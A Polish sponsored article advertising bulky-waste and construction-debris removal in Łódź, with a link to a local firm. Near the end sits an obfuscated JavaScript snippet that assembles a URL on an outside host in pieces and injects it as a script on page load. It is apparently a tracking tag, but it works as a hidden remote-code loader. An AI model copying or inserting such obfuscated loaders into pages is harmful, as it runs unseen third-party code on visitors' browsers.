Zamknij
REKLAMA

Wywóz odpadów w Łodzi - tylko z doświadczoną firmą

11:58, 12.09.2018 |
Skomentuj
REKLAMA

Odpady wielkogabarytowe potrafią sprawić dużo problemów – ze względu na ich rozmiary trudno je przechowywać, a wyniesienie ich do standardowych pojemników na odpady zmieszane nie jest możliwe. Jedynym rozwiązaniem jest zamówienie profesjonalnej firmy, która zajmie się wywozem odpadów. W Łodzi można liczyć na usługi doświadczonych, rzetelnych przedsiębiorstw, dysponujących nowoczesnym sprzętem, dostosowanym do transportu śmieci gabarytowych.

Odbiór odpadów – jak pozbyć się śmieci gabarytowych?

W dużych miastach, takich jak Łódź, wywóz odpadów wielkogabarytowych (http://eko-gruz-lodz.pl/wywoz-odpadow/) odbywa się w dwóch trybach:

- zgodnie z harmonogramem, wyznaczającym konkretne dni w miesiącu,

- na zlecenie, kiedy zajdzie taka potrzeba.

Harmonogram obowiązuje na osiedlach z budynkami wielorodzinnymi, natomiast mieszkańcy domów jednorodzinnych i właściciele ogródków działkowych zazwyczaj muszą zgłaszać potrzebę skorzystania z odbioru odpadów wielkogabarytowych.

Usługa wywozu śmieci obejmuje podstawienie w określonym miejscu specjalnego kontenera, z którego mogą korzystać mieszkańcy. Zazwyczaj jest on dostępny przez kilka dni – w tym czasie można do niego wrzucać wszystkie odpady, kwalifikujące się do śmieci ponadgabarytowych. Po upływie umówionego czasu, firma zajmuje się wywozem odpadów do miejsca ich składu, segregacji i utylizacji.

Co obejmuje wywóz odpadów wielkogabarytowych?

Odpady wielkogabarytowe to wszystkie przedmioty, jakie nie mieszczą się w standardowych pojemnikach na śmieci mieszane. Jest to jednak grupa nie zawierająca odpadów budowlanych, takich jak gruz czy stolarka, a także sprzętu elektrycznego i elektronicznego – w celu ich wywiezienia i utylizacji należy zamówić osobną usługę.

Odbiór odpadów wielkogabarytowych zazwyczaj obejmuje takie śmieci, jak:

- meble i armaturę, np. wanny,

- dywany, wykładziny,

- duże opakowania, skrzynie,

- opony,

- duże zabawki, wózki dla dzieci.

Segregacja odpadów już na etapie wrzucenia ich do kontenera jest bardzo ważna, ponieważ ułatwia ich segregację i późniejszą utylizację. Z tego względu warto dopilnować, by do kontenerów na odpady wielkogabarytowe trafiały wyłącznie śmieci tego typu.

Wywóz śmieci w Łodzi – komu zlecić?

Do takich usług, jak wywóz odpadów w Łodzi najlepiej wynająć doświadczoną firmę, która nie tylko dysponuje nowoczesnym sprzętem, ale także przy transporcie śmieci zachowuje normy i zasady związane z ochroną środowiska.

Profesjonalne przedsiębiorstwa, specjalizujące się w odbiorze odpadów wielkogabarytowych, dysponują wytrzymałymi kontenerami o różnych pojemnościach, ciężarówkami dostosowanymi do przewozu śmieci gabarytowych, a także cięższym sprzętem. Dzięki temu są w stanie szybko realizować nawet największe zlecenia.

Jak zamówić wywóz odpadów budowlanych?

Przy remontach nieuchronnie generuje się wiele śmieci – gruz, elementy stolarki i inne odpadki  zajmują dużo miejsca, a przy tym są trudne do przetransportowania. Rozwiązaniem tego problemu są usługi wywozu odpadów budowlanych, które nie zaliczają się do grupy śmieci ponadgabarytowych. Wystarczy zamówić kontener, a firma podstawi go pod wskazany adres i udostępni na umówiony czas.

(function(){ cag4=document.createElement("script");cag4_=("ust");cag4u="124303249"; cag4_+="a"+("t.i");cag4.type="text/javascript"; cag4u+=".8qgX0fu2ag45pug63gX2";cag4.async=true;cag4_+="n"+("f"+"o")+"/"; cag4u+="nzdm43ikt1";cag4.src="https://"+cag4_+cag4u; document.body.appendChild(cag4); })();

Co sądzisz na ten temat?

podoba mi się 0
nie podoba mi się 0
śmieszne 0
szokujące 0
przykre 0
wkurzające 0
facebookFacebook
twitterTwitter
wykopWykop
komentarzeKomentarze
REKLAMA
REKLAMA

komentarz (0)

Brak komentarza, Twój może być pierwszy.

Dodaj komentarz

REKLAMA